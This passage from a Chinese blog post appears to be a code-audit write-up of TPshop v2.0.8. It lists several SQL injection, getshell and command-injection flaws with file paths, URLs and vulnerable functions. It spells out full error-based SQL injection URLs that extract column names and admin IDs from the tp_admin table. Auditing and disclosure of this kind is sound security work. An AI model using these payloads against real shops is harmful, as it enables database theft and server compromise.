<div class="image-view" data-width="1892" data-height="958"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-49a00d3d9642daec.png" data-original-width="1892" data-original-height="958" data-original-format="image/png" data-original-filesize="209732" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-49a00d3d9642daec.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 282px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 40.36%;"></div>
<div class="image-view" data-width="1903" data-height="768"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-3ab97714fe14c6a7.png" data-original-width="1903" data-original-height="768" data-original-format="image/png" data-original-filesize="180214" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-3ab97714fe14c6a7.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 1965 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x74705f61646d696e AND table_schema=0x747073686f70322e302e36),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)
</code></pre>
<p></p>
<p></p>
获取某个表 某个字段名称：<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 354px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 50.629999999999995%;"></div>
<div class="image-view" data-width="1892" data-height="958"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-9ca8364ef8da5e83.png" data-original-width="1892" data-original-height="958" data-original-format="image/png" data-original-filesize="209732" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-9ca8364ef8da5e83.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 3302 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,451) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x74705f61646d696e AND table_schema=0x747073686f70322e302e36 LIMIT 0,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)
</code></pre>
<p>获取某库某表某字段数据：</p>
<br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 301px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 43.01%;"></div>
<div class="image-view" data-width="1895" data-height="815"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-ca002b3cd9c4d6d9.png" data-original-width="1895" data-original-height="815" data-original-format="image/png" data-original-filesize="184554" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-ca002b3cd9c4d6d9.png"></div>
</div>
<div class="image-caption"></div>
</div><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 680px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 35.42%;"></div>
<div class="image-view" data-width="1920" data-height="680"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-961628dd7746fc02.png" data-original-width="1920" data-original-height="680" data-original-format="image/png" data-original-filesize="166771" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-961628dd7746fc02.png"></div>
</div>
<div class="image-caption"></div>
</div><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 322px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 46.050000000000004%;"></div>
<div class="image-view" data-width="1900" data-height="875"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-f840ab7212359b62.png" data-original-width="1900" data-original-height="875" data-original-format="image/png" data-original-filesize="191446" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-f840ab7212359b62.png"></div>
</div>
<div class="image-caption"></div>
</div>
<pre class="hljs undefined"><code>http://127.0.0.1:8082/Home/Goods/goodsList/id/1/sort/shop_price/sort_asc/,(SELECT 2857 FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x2D2D2D2D,(SELECT MID((IFNULL(CAST(admin_id AS CHAR),0x20)),1,451) FROM `tpshop2.0.6`.tp_admin ORDER BY admin_id LIMIT 0,1),0x2D2D2D2D))s), 8446744073709551610, 8446744073709551610)))x)
</code></pre>
<p>漏洞2：前台sql注入 order by注入<br>
文件地址：application/home/controller/Goods.php<br>
URL地址：<a href="https://link.jianshu.com/?t=http://xx.com/index.php/Home/Goods/search/q/a/sort/sales_sum" target="_blank" rel="nofollow">http://xx.com/index.php/Home/Goods/search/q/a/sort/sales_sum</a><br>
问题函数：search()<br>
问题参数_1:  $sort = I('get.sort','goods_id'); // 排序<br>
问题参数_2:  $sort_asc = I('get.sort_asc','asc'); // 排序<br>
</p><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 472px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 67.51%;"></div>
<div class="image-view" data-width="1228" data-height="829"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-e9734af4366a606d.png" data-original-width="1228" data-original-height="829" data-original-format="image/png" data-original-filesize="131915" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-e9734af4366a606d.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 619px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 45.25%;"></div>
<div class="image-view" data-width="1368" data-height="619"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-4953212460c23fca.png" data-original-width="1368" data-original-height="619" data-original-format="image/png" data-original-filesize="101841" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-4953212460c23fca.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 633px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 55.53%;"></div>
<div class="image-view" data-width="1140" data-height="633"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-d4ce66d7fa16537a.png" data-original-width="1140" data-original-height="633" data-original-format="image/png" data-original-filesize="66466" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-d4ce66d7fa16537a.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 427px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 61.12%;"></div>
<div class="image-view" data-width="1551" data-height="948"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-f2624759236f183a.png" data-original-width="1551" data-original-height="948" data-original-format="image/png" data-original-filesize="150017" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-f2624759236f183a.png"></div>
</div>
<div class="image-caption"></div>
</div><p></p>
<p>漏洞3：前台sql注入 order by注入<br>
文件地址：application\mobile\controller\Goods.php<br>
URL地址：<a href="https://link.jianshu.com/?t=http://xx.com/index.php/Mobile/Goods/goodsList/id/1/sort_asc/desc" target="_blank" rel="nofollow">http://xx.com/index.php/Mobile/Goods/goodsList/id/1/sort_asc/desc</a><br>
问题函数：goodsList()<br>
问题参数_1:  $sort = I('get.sort','goods_id'); // 排序<br>
问题参数_2:  $sort_asc = I('get.sort_asc','asc'); // 排序<br>
</p><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 378px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 54.04%;"></div>
<div class="image-view" data-width="1732" data-height="936"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-410bc3262436b81e.png" data-original-width="1732" data-original-height="936" data-original-format="image/png" data-original-filesize="211277" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-410bc3262436b81e.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 330px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 47.199999999999996%;"></div>
<div class="image-view" data-width="1824" data-height="861"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-da4b1b15e48f3b56.png" data-original-width="1824" data-original-height="861" data-original-format="image/png" data-original-filesize="205515" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-da4b1b15e48f3b56.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 309px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 44.16%;"></div>
<div class="image-view" data-width="2081" data-height="919"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-dea0592289a80ac7.png" data-original-width="2081" data-original-height="919" data-original-format="image/png" data-original-filesize="189544" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-dea0592289a80ac7.png"></div>
</div>
<div class="image-caption"></div>
</div><p></p>
<p>漏洞3：前台sql注入 order by注入<br>
文件地址：application\mobile\controller\Goods.php<br>
URL地址：<a href="https://link.jianshu.com/?t=http://xx.com/index.php/Mobile/Goods/search/id/0/q/" target="_blank" rel="nofollow">http://xx.com/index.php/Mobile/Goods/search/id/0/q/</a>小米/sort/shop_price<br>
问题函数：search()<br>
问题参数_1:  $sort = I('get.sort','goods_id'); // 排序<br>
问题参数_2:  $sort_asc = I('get.sort_asc','asc'); // 排序<br>
</p><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 457px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 65.4%;"></div>
<div class="image-view" data-width="1390" data-height="909"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-74d3ceffc1c41a8f.png" data-original-width="1390" data-original-height="909" data-original-format="image/png" data-original-filesize="126844" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-74d3ceffc1c41a8f.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 394px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 56.42%;"></div>
<div class="image-view" data-width="1590" data-height="897"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-3c6c46aa3ac157f3.png" data-original-width="1590" data-original-height="897" data-original-format="image/png" data-original-filesize="161905" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-3c6c46aa3ac157f3.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 296px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 42.4%;"></div>
<div class="image-view" data-width="1908" data-height="809"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-18aeaf872ae04d66.png" data-original-width="1908" data-original-height="809" data-original-format="image/png" data-original-filesize="171941" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-18aeaf872ae04d66.png"></div>
</div>
<div class="image-caption"></div>
</div><p></p>
<h6>前后台getshell篇</h6>
<p>漏洞1：前台无限制getshell漏洞<br>
文件地址：application/home/controller/Test.php<br>
URL地址：<a href="https://link.jianshu.com/?t=http://xx.com/index.php/Home/test/dlfile" target="_blank" rel="nofollow">http://xx.com/index.php/Home/test/dlfile</a><br>
问题函数：dlfile()<br>
</p><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 481px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 68.71000000000001%;"></div>
<div class="image-view" data-width="1058" data-height="727"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-c0e241ca2fa247e2.png" data-original-width="1058" data-original-height="727" data-original-format="image/png" data-original-filesize="116933" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-c0e241ca2fa247e2.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 430px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 61.46%;"></div>
<div class="image-view" data-width="1165" data-height="716"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-147f641b1d72f987.png" data-original-width="1165" data-original-height="716" data-original-format="image/png" data-original-filesize="97426" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-147f641b1d72f987.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 387px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 55.38999999999999%;"></div>
<div class="image-view" data-width="1605" data-height="889"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-f52d042b80086239.png" data-original-width="1605" data-original-height="889" data-original-format="image/png" data-original-filesize="143036" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-f52d042b80086239.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 264px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 25.580000000000002%;"></div>
<div class="image-view" data-width="1032" data-height="264"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-6e5ce489a6dd47c7.png" data-original-width="1032" data-original-height="264" data-original-format="image/png" data-original-filesize="29727" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-6e5ce489a6dd47c7.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 352px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 26.83%;"></div>
<div class="image-view" data-width="1312" data-height="352"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-46e227bbaaaa2449.png" data-original-width="1312" data-original-height="352" data-original-format="image/png" data-original-filesize="65941" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-46e227bbaaaa2449.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 481px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 68.71000000000001%;"></div>
<div class="image-view" data-width="1058" data-height="727"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-be41dc7a6da4fc3b.png" data-original-width="1058" data-original-height="727" data-original-format="image/png" data-original-filesize="126221" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-be41dc7a6da4fc3b.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 166px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 18.65%;"></div>
<div class="image-view" data-width="890" data-height="166"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-a221b2d8f6ede3b2.png" data-original-width="890" data-original-height="166" data-original-format="image/png" data-original-filesize="14180" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-a221b2d8f6ede3b2.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 384px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 54.97%;"></div>
<div class="image-view" data-width="1661" data-height="913"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-35526c90ba355f46.png" data-original-width="1661" data-original-height="913" data-original-format="image/png" data-original-filesize="93305" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-35526c90ba355f46.png"></div>
</div>
<div class="image-caption"></div>
</div><p></p>
<p>漏洞2：前台无限制getshell漏洞<br>
文件地址：application/home/controller/Uploadify.php<br>
URL地址：<a href="https://link.jianshu.com/?t=http://xx.com/index.php/Home/Uploadify/preview" target="_blank" rel="nofollow">http://xx.com/index.php/Home/Uploadify/preview</a><br>
问题函数：preview()<br>
</p><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 481px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 68.71000000000001%;"></div>
<div class="image-view" data-width="1058" data-height="727"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-ba7f920248ca915e.png" data-original-width="1058" data-original-height="727" data-original-format="image/png" data-original-filesize="117356" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-ba7f920248ca915e.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 601px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 49.63%;"></div>
<div class="image-view" data-width="1211" data-height="601"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-c2f042fd770b0499.png" data-original-width="1211" data-original-height="601" data-original-format="image/png" data-original-filesize="140257" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-c2f042fd770b0499.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 465px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 28.67%;"></div>
<div class="image-view" data-width="1622" data-height="465"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-0f9ce5eb66dffd17.png" data-original-width="1622" data-original-height="465" data-original-format="image/png" data-original-filesize="85844" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-0f9ce5eb66dffd17.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 544px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 37.91%;"></div>
<div class="image-view" data-width="1435" data-height="544"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-7a7058525d6feea6.png" data-original-width="1435" data-original-height="544" data-original-format="image/png" data-original-filesize="76494" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-7a7058525d6feea6.png"></div>
</div>
<div class="image-caption"></div>
</div><p></p>
<p>漏洞3：后台有限制  命令注入 漏洞<br>
文件地址：application\admin\controller\Plugin.php<br>
URL地址：<a href="https://link.jianshu.com/?t=http://xx.com/index.php/Admin/Plugin/add_shipping" target="_blank" rel="nofollow">http://xx.com/index.php/Admin/Plugin/add_shipping</a><br>
问题函数：add_shipping<br>
</p><div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 520px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 74.39%;"></div>
<div class="image-view" data-width="1179" data-height="877"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-92b7974a09cd4fdc.png" data-original-width="1179" data-original-height="877" data-original-format="image/png" data-original-filesize="157880" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-92b7974a09cd4fdc.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 414px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 36.83%;"></div>
<div class="image-view" data-width="1124" data-height="414"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-e32e42ddede5849a.png" data-original-width="1124" data-original-height="414" data-original-format="image/png" data-original-filesize="77577" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-e32e42ddede5849a.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 624px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 59.040000000000006%;"></div>
<div class="image-view" data-width="1057" data-height="624"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-e737ea28594bcb92.png" data-original-width="1057" data-original-height="624" data-original-format="image/png" data-original-filesize="73015" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-e737ea28594bcb92.png"></div>
</div>
<div class="image-caption"></div>
</div><img target="_blank" rel="nofollow" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/saved_resource">http://upload-images.jianshu.io/upload_images/4776936-514b99153b5ba25e.png</img>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 368px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 21.98%;"></div>
<div class="image-view" data-width="1674" data-height="368"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-9e9f7dd6ce8716d3.png" data-original-width="1674" data-original-height="368" data-original-format="image/png" data-original-filesize="70853" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-9e9f7dd6ce8716d3.png"></div>
</div>
<div class="image-caption"></div>
</div><br>
<div class="image-package">
<div class="image-container" style="max-width: 700px; max-height: 303px; background-color: transparent;">
<div class="image-container-fill" style="padding-bottom: 23.9%;"></div>
<div class="image-view" data-width="1268" data-height="303"><img data-original-src="//upload-images.jianshu.io/upload_images/4776936-955963444cd98368.png" data-original-width="1268" data-original-height="303" data-original-format="image/png" data-original-filesize="47320" style="cursor: zoom-in;" class="" src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/4776936-955963444cd98368.png"></div>
</div>
<div class="image-caption"></div>
</div><p></p>

        </div>
        <!--  -->

        <div class="show-foot">
          <a class="notebook" href="http://www.jianshu.com/nb/9917882">
            <i class="iconfont ic-search-notebook"></i>
            <span>代码审计</span>
</a>          <div class="copyright" data-toggle="tooltip" data-html="true" data-original-title="转载请联系作者获得授权，并标注“简书作者”。">
            © 著作权归作者所有
          </div>
          
        </div>
    </div>

    <!-- 文章底部作者信息 -->
      <div class="follow-detail">
        <div class="info">
          <a class="avatar" href="http://www.jianshu.com/u/e199acf1e9fb">
            <img src="./TPshop_20171106_v2.0.8版-多个漏洞集合 - 简书_files/c969adea-86f2-454f-ab6c-188fa99c4ffe(1).jpg" alt="96">
</a>          <div props-data-classes="user-follow-button-footer" data-author-follow-button=""></div>
          <a class="title" href="http://www.jianshu.com/u/e199acf1e9fb">P喵呜</a>
          
        <p>写了 19363 字，被 23 人关注，获得了 11 个喜欢</p></div>
          <div class="signature">╮(╯▽╰)╭ 这个人，懒到简介都懒的写了呢~</div>
      </div>

      <div class="support-author"><p>(｡・`ω´･) 哇哦</p> <div class="btn btn-pay">赞赏支持</div> <!----> <!----> <!----></div>

    <div class="meta-bottom">
      <div class="like"><div class="btn like-group"><div class="btn-like"><a><i class="iconfont ic-like"></i>喜欢</a></div> <div class="modal-wrap"><a>0</a></div></div> <!----></div>
      <div class="share-group">
        <a class="share-circle" data-action="weixin-share" data-toggle="tooltip" data-original-title="分享到微信">
          <i class="iconfont ic-wechat"></i>
        </a>
        <a class="share-circle" data-action="weibo-share" data-toggle="tooltip" href="javascript:void((function(s,d,e,r,l,p,t,z,c){var%20f=&#39;http://v.t.sina.com.cn/share/share.php?appkey=1881139527&#39;,u=z||d.location,p=[&#39;&amp;url=&#39;,e(u),&#39;&amp;title=&#39;,e(t||d.title),&#39;&amp;source=&#39;,e(r),&#39;&amp;sourceUrl=&#39;,e(l),&#39;&amp;content=&#39;,c||&#39;gb2312&#39;,&#39;&amp;pic=&#39;,e(p||&#39;&#39;)].join(&#39;&#39;);function%20a(){if(!window.open([f,p].join(&#39;&#39;),&#39;mb&#39;,[&#39;toolbar=0,status=0,resizable=1,width=440,height=430,left=&#39;,(s.width-440)/2,&#39;,top=&#39;,(s.height-430)/2].join(&#39;&#39;)))u.href=[f,p].join(&#39;&#39;);};if(/Firefox/.test(navigator.userAgent))setTimeout(a,0);else%20a();})(screen,document,encodeURIComponent,&#39;&#39;,&#39;&#39;,&#39;&#39;, &#39;我写了新文章《TPshop_20171106_v2.0.8版-多个漏洞集合》（ 分享自 @简书 ）&#39;,&#39;http://www.jianshu.com/p/fffc0ee0dab7?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=reader_share&amp;utm_source=weibo&#39;,&#39;页面编码gb2312|utf-8默认gb2312&#39;));" data-original-title="分享到微博">
          <i class="iconfont ic-weibo"></i>
        </a>
          <a class="share-circle" data-toggle="tooltip" href="http://cwb.assets.jianshu.io/notes/images/20314398/weibo/image_d9911aaaead4.jpg" target="_blank" data-original-title="下载长微博图片">
            <i class="iconfont ic-picture"></i>
          </a>
        <a class="share-circle more-share" tabindex="0" data-toggle="popover" data-placement="top" data-html="true" data-trigger="focus" href="javascript:void(0);" data-content="
          &lt;ul class=&quot;share-list&quot;&gt;
            &lt;li&gt;&lt;a href=&quot;javascript:void(function(){var d=document,e=encodeURIComponent,r=&#39;http://sns.qzone.qq.com/cgi-bin/qzshare/cgi_qzshare_onekey?url=&#39;+e(&#39;http://www.jianshu.com/p/fffc0ee0dab7?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=reader_share&amp;utm_source=qzone&#39;)+&#39;&amp;title=&#39;+e(&#39;我写了新文章《TPshop_20171106_v2.0.8版-多个漏洞集合》&#39;),x=function(){if(!window.open(r,&#39;qzone&#39;,&#39;toolbar=0,resizable=1,scrollbars=yes,status=1,width=600,height=600&#39;))location.href=r};if(/Firefox/.test(navigator.userAgent)){setTimeout(x,0)}else{x()}})();&quot;&gt;&lt;i class=&quot;social-icon-sprite social-icon-zone&quot;&gt;&lt;/i&gt;&lt;span&gt;分享到QQ空间&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href=&quot;javascript:void(function(){var d=document,e=encodeURIComponent,r=&#39;https://twitter.com/share?url=&#39;+e(&#39;http://www.jianshu.com/p/fffc0ee0dab7?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=reader_share&amp;utm_source=twitter&#39;)+&#39;&amp;text=&#39;+e(&#39;我写了新文章《TPshop_20171106_v2.0.8版-多个漏洞集合》（ 分享自 @jianshucom ）&#39;)+&#39;&amp;related=&#39;+e(&#39;jianshucom&#39;),x=function(){if(!window.open(r,&#39;twitter&#39;,&#39;toolbar=0,resizable=1,scrollbars=yes,status=1,width=600,height=600&#39;))location.href=r};if(/Firefox/.test(navigator.userAgent)){setTimeout(x,0)}else{x()}})();&quot;&gt;&lt;i class=&quot;social-icon-sprite social-icon-twitter&quot;&gt;&lt;/i&gt;&lt;span&gt;分享到Twitter&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href=&quot;javascript:void(function(){var d=document,e=encodeURIComponent,r=&#39;https://www.facebook.com/dialog/share?app_id=483126645039390&amp;display=popup&amp;href=http://www.jianshu.com/p/fffc0ee0dab7?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=reader_share&amp;utm_source=facebook&#39;,x=function(){if(!window.open(r,&#39;facebook&#39;,&#39;toolbar=0,resizable=1,scrollbars=yes,status=1,width=450,height=330&#39;))location.href=r};if(/Firefox/.test(navigator.userAgent)){setTimeout(x,0)}else{x()}})();&quot;&gt;&lt;i class=&quot;social-icon-sprite social-icon-facebook&quot;&gt;&lt;/i&gt;&lt;span&gt;分享到Facebook&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href=&quot;javascript:void(function(){var d=document,e=encodeURIComponent,r=&#39;https://plus.google.com/share?url=&#39;+e(&#39;http://www.jianshu.com/p/fffc0ee0dab7?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=reader_share&amp;utm_source=google_plus&#39;),x=function(){if(!window.open(r,&#39;google_plus&#39;,&#39;toolbar=0,resizable=1,scrollbars=yes,status=1,width=450,height=330&#39;))location.href=r};if(/Firefox/.test(navigator.userAgent)){setTimeout(x,0)}else{x()}})();&quot;&gt;&lt;i class=&quot;social-icon-sprite social-icon-google&quot;&gt;&lt;/i&gt;&lt;span&gt;分享到Google+&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
            &lt;li&gt;&lt;a href=&quot;javascript:void(function(){var d=document,e=encodeURIComponent,s1=window.getSelection,s2=d.getSelection,s3=d.selection,s=s1?s1():s2?s2():s3?s3.createRange().text:&#39;&#39;,r=&#39;http://www.douban.com/recommend/?url=&#39;+e(&#39;http://www.jianshu.com/p/fffc0ee0dab7?utm_campaign=maleskine&amp;utm_content=note&amp;utm_medium=reader_share&amp;utm_source=douban&#39;)+&#39;&amp;title=&#39;+e(&#39;TPshop_20171106_v2.0.8版-多个漏洞集合&#39;)+&#39;&amp;sel=&#39;+e(s)+&#39;&amp;v=1&#39;,x=function(){if(!window.open(r,&#39;douban&#39;,&#39;toolbar=0,resizable=1,scrollbars=yes,status=1,width=450,height=330&#39;))location.href=r+&#39;&amp;r=1&#39;};if(/Firefox/.test(navigator.userAgent)){setTimeout(x,0)}else{x()}})()&quot;&gt;&lt;i class=&quot;social-icon-sprite social-icon-douban&quot;&gt;&lt;/i&gt;&lt;span&gt;分享到豆瓣&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
          &lt;/ul&gt;
        " data-original-title="" title="">更多分享</a>
